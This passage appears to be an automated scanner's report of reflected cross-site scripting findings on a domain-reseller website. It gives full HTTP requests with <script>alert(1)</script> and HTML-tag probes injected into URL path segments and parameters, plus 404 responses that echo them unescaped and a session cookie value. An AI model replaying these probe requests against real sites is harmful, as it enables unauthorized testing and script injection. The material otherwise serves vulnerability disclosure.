GET /web-service/domain-names/themes/kosmos/images/reviewba0b9<script>alert(1)</script>8af71bced91/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/reviewba0b9<script>alert(1)</script>8af71bced91/5.gif was not found on this server.</p>
...[SNIP]...

2.5062. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e98bc<script>alert(1)</script>a28f0f83c6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/5.gife98bc<script>alert(1)</script>a28f0f83c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/5.gife98bc<script>alert(1)</script>a28f0f83c6 was not found on this server.</p>
...[SNIP]...

2.5063. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe772<script>alert(1)</script>6075190bdba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/5.gif?fe772<script>alert(1)</script>6075190bdba=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/5.gif?fe772<script>alert(1)</script>6075190bdba=1 was not found on this server.</p>
...[SNIP]...

2.5064. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c155<script>alert(1)</script>b6198d61a0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6c155<script>alert(1)</script>b6198d61a0e/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6c155<script>alert(1)</script>b6198d61a0e/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5065. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3410b<script>alert(1)</script>1cb2d5be38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names3410b<script>alert(1)</script>1cb2d5be38/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names3410b<script>alert(1)</script>1cb2d5be38/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5066. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67e8e<script>alert(1)</script>60933bb864a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes67e8e<script>alert(1)</script>60933bb864a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes67e8e<script>alert(1)</script>60933bb864a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5067. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2929b<script>alert(1)</script>db4be8a9390 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos2929b<script>alert(1)</script>db4be8a9390/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos2929b<script>alert(1)</script>db4be8a9390/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5068. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e14e7<script>alert(1)</script>cc7bb15b9fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagese14e7<script>alert(1)</script>cc7bb15b9fe/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagese14e7<script>alert(1)</script>cc7bb15b9fe/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5069. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b5aea<script>alert(1)</script>a4aef58ea30 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/reviewb5aea<script>alert(1)</script>a4aef58ea30/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/reviewb5aea<script>alert(1)</script>a4aef58ea30/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5070. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fbbc5<script>alert(1)</script>d3860540d1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.phpfbbc5<script>alert(1)</script>d3860540d1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.phpfbbc5<script>alert(1)</script>d3860540d1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5071. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9aad3<a>7b6754beae was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9aad3<a>7b6754beae&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9aad3<a>7b6754beae&opt=2 was not found on this server.</p>
...[SNIP]...

2.5072. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a0d73<a>24945789380 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...a0d73<a>24945789380&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...a0d73<a>24945789380&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5073. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ca40a<script>alert(1)</script>77668e37d66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ca40a<script>alert(1)</script>77668e37d66=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ca40a<script>alert(1)</script>77668e37d66=1 was not found on this server.</p>
...[SNIP]...

2.5074. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 31a6d<a>f1089682e11 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=231a6d<a>f1089682e11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=231a6d<a>f1089682e11 was not found on this server.</p>
...[SNIP]...

2.5075. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51e6a<script>alert(1)</script>b9a79a377c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service51e6a<script>alert(1)</script>b9a79a377c2/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service51e6a<script>alert(1)</script>b9a79a377c2/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5076. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7053a<script>alert(1)</script>57556becb66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names7053a<script>alert(1)</script>57556becb66/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names7053a<script>alert(1)</script>57556becb66/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5077. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cea25<script>alert(1)</script>5764b729238 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themescea25<script>alert(1)</script>5764b729238/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themescea25<script>alert(1)</script>5764b729238/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5078. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6571e<script>alert(1)</script>b5e78cd5151 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos6571e<script>alert(1)</script>b5e78cd5151/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
